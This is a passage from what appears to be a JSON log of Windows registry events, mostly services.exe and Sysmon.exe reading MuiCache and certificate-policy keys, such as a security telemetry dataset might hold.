"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 